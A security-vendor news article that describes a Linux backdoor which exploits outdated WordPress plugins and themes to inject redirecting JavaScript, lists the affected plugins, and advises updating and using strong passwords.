Linux Malware Targets 30+ WordPress Plugins

Learn about PurpleSec’s fully managed vulnerability management services.

Author: Eva Georgieva / Last Updated: 01/15/2022

Reviewed By: Dalibor Gašić

View Our: Editorial Process

Table Of Contents

What Happened?
What Was The Impact?
WordPress Exploit Version 1 & 2
The Future Of The Attack
How Can This Attack Be Prevented?

Summary Of The Attack

Linux Trojan Application exploits outdated plugins and themes in WordPress sites for malicious purposes.
Two versions of the malicious application exist with the second one being an improved version of the first.
There is a chance that even if updates are made on the plugins, the attackers can still target administrators accounts on the WordPress sites.
It is quite important to keep all components of the WordPress sites up-to-date.

What Happened?

A Linux backdoor malware has been discovered that has the capabilities to exploit around 30 WordPress plugins with the goal to inject malicious JavaScript code and make user redirects to harmful, malicious, phishing sites created by the attackers.

What Was The Impact?

The reason why such exploits are possible is the vulnerable WordPress sites are running outdated versions of the plugins and themes.

Due to that, the attackers are able to carry out these attacks since once a user lands on an infected WordPress site, it is immediately redirected to a malicious web page where they:

Fall victim to malvertising.
Are tricked to download malware on their computers.
Become a target to phishing attacks.

WordPress Exploit Version 1 & 2

Dr.Web, a security researcher, discovered the malware Linux.BackDoor.WordPressExploit.1.

This malware attempts to exploit websites through outdated and vulnerable plugins or themes.

Once it is confirmed that the website has a vulnerable plugin installed, it acts as a backdoor in order to insert a malicious JavaScript that is extracted from a remote Command and Control server to the vulnerable website.

From there, once one or several vulnerabilities are successfully exploited, the vulnerable page is injected with harmful JavaScript.

Whenever a user loads the page, the malicious JavaScript is initiated first and a redirection to a malicious site occurs.

A second version of the trojan application, Linux.BackDoor.WordPressExploit, is the Command and Control server address and the domain address from which the JavaScript that is used in the exploit is downloaded.

A total of 30 outdated themes and plugins have been identified and should be updated immediately:

WP Live Chat Support PluginThim Core
Yellow Pencil Visual Theme Customizer Plugin
Easysmtp
WordPress – Yuzo Related Posts
WP GDPR Compliance Plugin
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
WP Quick Booking Manager
Google Code Inserter
Post Custom Templates Lite
Total Donations Plugin
Faceboor Live Chat by Zotabox
Blog Designer WordPress Plugin
WP Live Chat
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WordPress ND Shortcodes For Visual Composer
WP-Matomo Integration (WP-Piwik)
Hybrid
Coming Soon Page and Maintenance Mode

The Future Of The Attack

According to the initial research by Doctor Web, version 1 and version 2 of the trojan application have unimplemented functionality which could allow them to conduct brute-force attacks on the administrator’s accounts of the affected websites through crafted username-passwords dictionaries.

This could even possibly allow the attackers to exploit these websites even after the plugin and theme versions are patched.

How Can This Attack Be Prevented?

The remediation and prevention for this type of attack generally consist of 2 steps:

Updating the plugin and themes versions on your WordPress website.
Creating strong passwords for your accounts.

The way to check whether a plugin is outdated is through the WordPress Plugin Directory where you can check the current version of the plugin when it was last updated and if it is still maintained.

Related Articles: